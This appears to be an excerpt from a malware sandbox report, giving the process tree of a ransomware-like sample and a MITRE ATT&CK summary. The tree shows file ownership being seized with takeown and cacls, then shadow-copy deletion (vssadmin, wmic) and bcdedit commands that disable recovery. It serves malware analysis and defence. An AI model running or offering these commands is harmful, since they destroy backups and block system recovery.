C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:468
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "overlay.png" -nobanner3⤵PID:1904
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "overlay.png" -nobanner4⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:1772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "background.png" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "background.png" -nobanner4⤵PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F9668CEF-81AF-4F22-A89A-9BA9AC05D97A} S-1-5-21-403932158-3302036622-1224131197-1000:ELJKIHEZ\Admin:Interactive:[1]1⤵PID:1328
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ruuoNhmf.bat"2⤵PID:1800
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1948
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:756
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:1468
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1844
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3